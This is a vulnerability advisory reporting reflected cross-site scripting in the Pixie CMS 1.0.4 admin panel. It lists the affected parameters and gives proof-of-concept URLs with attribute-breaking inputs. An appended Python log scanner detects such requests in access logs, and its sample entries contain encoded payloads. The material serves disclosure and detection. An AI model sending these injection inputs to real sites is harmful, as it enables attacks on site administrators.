# Exploit Title: XSS Vulnerability on Pixie 1.0.4
# Google Dork: no
# Date: 29-03-2017
# Exploit Author: @rungga_reksya, @dickysofficial
# Vendor Homepage: http://www.getpixie.co.uk
# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip
# Version: 1.0.4
# Tested on: Windows Server 2012 Datacenter Evaluation

I. Background:
Pixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a "content management system (cms)", we prefer to call it as Small, Simple, Site Maker.

II. Description:
XSS Vulnerability on Pixie 1.0.4

We found XSS on parameters:
s=login&m=
s=settings&x=
s=publish&m=static&x=
s=publish&m=dynamic&x=
s=publish&m=module&x=

III. Exploit:
- http://ip_address/folder_pixie_v1.04/admin/?s=login&m=">
  or
  http://ip_address/folder_pixie_v1.04/admin/index.php?s=login&m=">
- http://ip_address/folder_pixie_v1.04/admin/index.php?s=settings&x=">
- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=static&x=">
- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=dynamic&x=">
- http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=module&x=">

IV. Thanks to:
- Alloh SWT
- https://packetstormsecurity.com/files/126870/Pixie-CMS-1.04-Cross-Site-Scripting.html
- MyBoboboy
- @dickysofficial
- Komunitas IT Auditor & IT Security Kaskus
- Openbugbounty.org
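
V. Detection example (added here, not part of the original advisory or of Pixie's code):
A log check for the parameters listed in section II: it flags requests to the Pixie admin page whose reported parameter (m for s=login, x for s=settings and s=publish) decodes to a value containing HTML metacharacters. The combined access log format, the function names and the sample log entries are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameter the advisory reports as reflected, keyed by the admin section (s=).
REFLECTED = {"login": "m", "settings": "x", "publish": "x"}
# Characters that let a value close an HTML attribute or open a tag.
HTML_META = re.compile(r"[\"'<>]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries; addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Mar/2017:10:00:01 +0000] "GET /folder_pixie_v1.04/admin/index.php?s=login&m=%22%3E HTTP/1.1" 200 5120',
    '192.0.2.10 - - [29/Mar/2017:10:00:09 +0000] "GET /folder_pixie_v1.04/admin/index.php?s=publish&m=static&x=about HTTP/1.1" 200 7301',
    '198.51.100.7 - - [29/Mar/2017:10:02:44 +0000] "GET /folder_pixie_v1.04/admin/?s=settings&x=%2522%253E HTTP/1.1" 200 4987',
    '198.51.100.7 - - [29/Mar/2017:10:03:02 +0000] "GET /folder_pixie_v1.04/index.php?s=blog&x=%22%3E HTTP/1.1" 200 2210',
]


def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so values encoded more than once are inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_pixie_xss(log_lines):
    """Return (line_number, section, parameter, decoded_value) per suspect request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # Only the admin entry points named in section III are in scope.
        if not url.path.endswith(("/admin/", "/admin/index.php")):
            continue
        query = parse_qs(url.query, keep_blank_values=True)  # decodes once
        section = query.get("s", [""])[0]
        param = REFLECTED.get(section)
        for raw in query.get(param, []) if param else []:
            value = fully_unquote(raw)
            if HTML_META.search(value):
                hits.append((number, section, param, value))
    return hits
```

Calling flag_pixie_xss(SAMPLE_LOG) flags entries 1 and 3 and leaves the ordinary publish request and the non-admin request alone.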